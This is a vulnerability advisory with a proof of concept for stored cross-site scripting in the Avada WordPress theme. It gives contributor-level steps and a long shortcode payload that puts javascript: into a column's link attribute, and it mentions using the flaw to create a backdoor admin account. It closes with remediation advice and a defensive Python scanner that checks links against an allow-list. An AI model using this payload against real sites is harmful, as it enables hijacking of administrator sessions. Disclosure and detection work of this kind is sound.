Exploit Author: Muhammad Zeeshan (Xib3rR4dAr)
The Avada | Website Builder For WordPress & WooCommerce theme for WordPress is vulnerable to Stored Cross-Site Scripting via fusion_builder_column
shortcode in versions up to, and including, 7.11.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
While creating a button, Avada allows attributes to be added to the button, which can be exploited to perform XSS. By exploiting the XSS, an attacker can perform actions on behalf of other users, such as creating a new backdoor admin account when an administrator views the form.
The link parameter/attribute in the fusion_builder_column shortcode can be set to contain the javascript: protocol, which allows execution of custom JS when the column is clicked, for example:
link="javascript:alert('XSS')"
- Login as contributor user
- Visit http://192.168.253.1/wp-admin/post-new.php
- Enter any name for Post Title
- In the editor, the "Text" tab should already be selected; if not, click the "Text" tab, then paste:
[fusion_builder_container type="flex" hundred_percent="no" hundred_percent_height="no" hundred_percent_height_scroll="no" align_content="stretch" flex_align_items="flex-start" flex_justify_content="flex-start" flex_wrap="wrap" hundred_percent_height_center_content="yes" equal_height_columns="no" container_tag="div" hide_on_mobile="small-visibility,medium-visibility,large-visibility" status="published" border_style="solid" box_shadow_blur="0" box_shadow_spread="0" background_color="" gradient_start_color="" gradient_end_color="" gradient_start_position="0" gradient_end_position="100" gradient_type="linear" radial_direction="center center" linear_angle="180" background_image_medium="" background_image_small="" background_image="" skip_lazy_load="" background_position_medium="" background_position_small="" background_position="center center" background_repeat_medium="" background_repeat_small="" background_repeat="no-repeat" background_size_medium="" background_size_small="" background_size="" background_custom_size="" background_custom_size_medium="" background_custom_size_small="" fade="no" background_parallax="none" enable_mobile="no" parallax_speed="0.3" background_blend_mode_medium="" background_blend_mode_small="" background_blend_mode="none" background_slider_images="" background_slider_position="" background_slider_skip_lazy_loading="no" background_slider_loop="yes" background_slider_pause_on_hover="no" background_slider_slideshow_speed="5000" background_slider_animation="fade" background_slider_direction="up" background_slider_animation_speed="800" background_slider_blend_mode="" video_mp4="" video_webm="" video_ogv="" video_url="" video_aspect_ratio="16:9" video_loop="yes" video_mute="yes" video_preview_image="" pattern_bg="none" pattern_custom_bg="" pattern_bg_color="" pattern_bg_style="default" pattern_bg_opacity="100" pattern_bg_size="" pattern_bg_blend_mode="normal" mask_bg="none" mask_custom_bg="" mask_bg_color="" mask_bg_accent_color="" 
mask_bg_style="default" mask_bg_opacity="100" mask_bg_transform="left" mask_bg_blend_mode="normal" render_logics="" logics="" absolute="off" absolute_devices="small,medium,large" sticky="off" sticky_devices="small-visibility,medium-visibility,large-visibility" sticky_background_color="" sticky_height="" sticky_offset="" sticky_transition_offset="0" scroll_offset="0" animation_type="" animation_direction="left" animation_color="" animation_speed="0.3" animation_delay="0" animation_offset="" filter_hue="0" filter_saturation="100" filter_brightness="100" filter_contrast="100" filter_invert="0" filter_sepia="0" filter_opacity="100" filter_blur="0" filter_hue_hover="0" filter_saturation_hover="100" filter_brightness_hover="100" filter_contrast_hover="100" filter_invert_hover="0" filter_sepia_hover="0" filter_opacity_hover="100" filter_blur_hover="0"][fusion_builder_row][fusion_builder_column type="1_1" layout="1_1" align_self="auto" content_layout="column" align_content="flex-start" valign_content="flex-start" content_wrap="wrap" spacing="" center_content="no" column_tag="div" link="javascript:alert('XSS')" target="_self" link_description="" min_height="" hide_on_mobile="small-visibility,medium-visibility,large-visibility" sticky_display="normal,sticky" class="" id="" type_medium="" type_small="" flex_grow_medium="" flex_grow_small="" flex_grow="" flex_shrink_medium="" flex_shrink_small="" flex_shrink="" order_medium="0" order_small="0" spacing_left_medium="" spacing_right_medium="" spacing_left_small="" spacing_right_small="" spacing_left="" spacing_right="" margin_top_medium="" margin_bottom_medium="" margin_top_small="" margin_bottom_small="" margin_top="" margin_bottom="" padding_top_medium="" padding_right_medium="" padding_bottom_medium="" padding_left_medium="" padding_top_small="" padding_right_small="" padding_bottom_small="" padding_left_small="" padding_top="" padding_right="" padding_bottom="" padding_left="" hover_type="none" border_sizes_top="" 
border_sizes_right="" border_sizes_bottom="" border_sizes_left="" border_color_hover="" hue="" saturation="" lightness="" alpha="" border_color="" border_style="solid" border_radius_top_left="" border_radius_top_right="" border_radius_bottom_right="" border_radius_bottom_left="" box_shadow="no" box_shadow_vertical="" box_shadow_horizontal="" box_shadow_blur="0" box_shadow_spread="0" box_shadow_color="" box_shadow_style="" z_index_hover="" z_index="" overflow="" background_type="single" background_color_medium="" background_color_small="" background_color_medium_hover="" background_color_small_hover="" background_color_hover="" background_color="" gradient_start_color="" gradient_end_color="" gradient_start_position="0" gradient_end_position="100" gradient_type="linear" radial_direction="center center" linear_angle="180" background_image_medium="" background_image_small="" background_image="" background_image_id_medium="" background_image_id_small="" background_image_id="" lazy_load="none" skip_lazy_load="" background_position_medium="" background_position_small="" background_position="left top" background_repeat_medium="" background_repeat_small="" background_repeat="no-repeat" background_size_medium="" background_size_small="" background_size="" background_custom_size="" background_custom_size_medium="" background_custom_size_small="" background_blend_mode_medium="" background_blend_mode_small="" background_blend_mode="none" background_slider_images="" background_slider_position="" background_slider_skip_lazy_loading="no" background_slider_loop="yes" background_slider_pause_on_hover="no" background_slider_slideshow_speed="5000" background_slider_animation="fade" background_slider_direction="up" background_slider_animation_speed="800" background_slider_blend_mode="" render_logics="" sticky="off" sticky_devices="small-visibility,medium-visibility,large-visibility" sticky_offset="" absolute="off" absolute_top="" absolute_right="" absolute_bottom="" absolute_left="" 
filter_type="regular" filter_hover_element="self" filter_hue_hover="0" filter_saturation_hover="100" filter_brightness_hover="100" filter_contrast_hover="100" filter_invert_hover="0" filter_sepia_hover="0" filter_opacity_hover="100" filter_blur_hover="0" filter_hue="0" filter_saturation="100" filter_brightness="100" filter_contrast="100" filter_invert="0" filter_sepia="0" filter_opacity="100" filter_blur="0" transform_type="regular" transform_hover_element="self" transform_scale_x_hover="1" transform_scale_y_hover="1" transform_translate_x_hover="0" transform_translate_y_hover="0" transform_rotate_hover="0" transform_skew_x_hover="0" transform_skew_y_hover="0" transform_scale_x="1" transform_scale_y="1" transform_translate_x="0" transform_translate_y="0" transform_rotate="0" transform_skew_x="0" transform_skew_y="0" transform_origin="" transition_duration="300" transition_easing="ease" transition_custom_easing="" motion_effects="W10=" scroll_motion_devices="small-visibility,medium-visibility,large-visibility" animation_type="" animation_direction="left" animation_color="" animation_speed="0.3" animation_delay="0" animation_offset="" last="true" border_position="all" first="true"][fusion_pricing_table type="1" backgroundcolor="" hue="" saturation="" lightness="" alpha="" background_color_hover="" bordercolor="" dividercolor="" heading_color_style_1="" heading_color_style_2="" pricing_color="" body_text_color="" margin_top="" margin_right="" margin_bottom="" margin_left="" hide_on_mobile="small-visibility,medium-visibility,large-visibility" class="" id="" columns="2"][fusion_pricing_column title="Standard" standout="no"][fusion_pricing_price currency="$" currency_position="left" price="15.55" time="monthly" ][/fusion_pricing_price][fusion_pricing_row]Feature 1[/fusion_pricing_row][fusion_pricing_row]Feature 2[/fusion_pricing_row][fusion_pricing_footer]Click for more info[/fusion_pricing_footer][/fusion_pricing_column][fusion_pricing_column title="Premium" 
standout="yes"][fusion_pricing_price currency="$" currency_position="left" price="25.55" time="monthly" ][/fusion_pricing_price][fusion_pricing_row]Feature 1[/fusion_pricing_row][fusion_pricing_row]Feature 2[/fusion_pricing_row][fusion_pricing_footer]Click for more info[/fusion_pricing_footer][/fusion_pricing_column][/fusion_pricing_table][/fusion_builder_column][/fusion_builder_row][/fusion_builder_container]
- Click "Submit for review"
- Logout from contributor user
- Login as administrator user
- Visit http://192.168.253.1/wp-admin/edit.php
- Click "preview" on post created by contributor user
- Clicking anywhere inside the column, e.g. on the table, triggers the XSS.
Users with the Author role (and higher roles) can directly publish a post containing the XSS payload in the shortcode; the XSS then triggers when any visitor views the post and clicks inside the column.
Allow only whitelisted protocols such as http/https in the link attribute of fusion_builder_column.
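As an added defensive example (not code from this advisory or from the Avada theme), the following Python implements the protocol allow-list the remediation describes and uses it to scan stored post content for fusion_builder_column shortcodes whose link attribute fails the check. The shortcode parsing is a deliberate simplification and the sample post content is constructed for the demonstration.

```python
import html
import re

# Only these URL schemes are acceptable in a column "link" attribute.
ALLOWED_SCHEMES = {"http", "https"}

# Browsers ignore tab, newline and CR inside a scheme, and the value ends up
# in an href, so HTML entities are decoded and control characters removed
# before the scheme is read (otherwise "java&#x09;script:" would slip past).
_CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")

def is_safe_link(value: str) -> bool:
    """True if the link is relative or uses an allow-listed scheme."""
    cleaned = _CONTROL_CHARS.sub("", html.unescape(value)).lower()
    match = _SCHEME.match(cleaned)
    if match is None:
        return True  # no scheme: a relative URL such as "/pricing" or "#top"
    return match.group(1) in ALLOWED_SCHEMES

# Simplified shortcode parsing (assumption: attribute values contain no "]").
_COLUMN_TAG = re.compile(r"\[fusion_builder_column\b([^\]]*)\]")
_ATTR = re.compile(r'(\w+)\s*=\s*"([^"]*)"')

def find_unsafe_column_links(content: str) -> list:
    """Return the raw link values of every column whose link fails the check."""
    findings = []
    for tag in _COLUMN_TAG.finditer(content):
        attrs = dict(_ATTR.findall(tag.group(1)))
        link = attrs.get("link", "")
        if link and not is_safe_link(link):
            findings.append(link)
    return findings

# Constructed sample post content: one benign column, two that should be flagged.
SAMPLE_POST = (
    '[fusion_builder_container type="flex"][fusion_builder_row]'
    '[fusion_builder_column type="1_1" link="javascript:alert(\'XSS\')" target="_self"]'
    'col 1[/fusion_builder_column]'
    '[fusion_builder_column type="1_2" link="https://example.com/pricing"]'
    'col 2[/fusion_builder_column]'
    '[fusion_builder_column type="1_2" link="  JaVa&#x09;ScRiPt:alert(1)"]'
    'col 3[/fusion_builder_column]'
    '[/fusion_builder_row][/fusion_builder_container]'
)

if __name__ == "__main__":
    for link in find_unsafe_column_links(SAMPLE_POST):
        print("unsafe column link:", repr(link))
```

The same check can be run over the post_content column of an existing site's database to find already-stored payloads before patching.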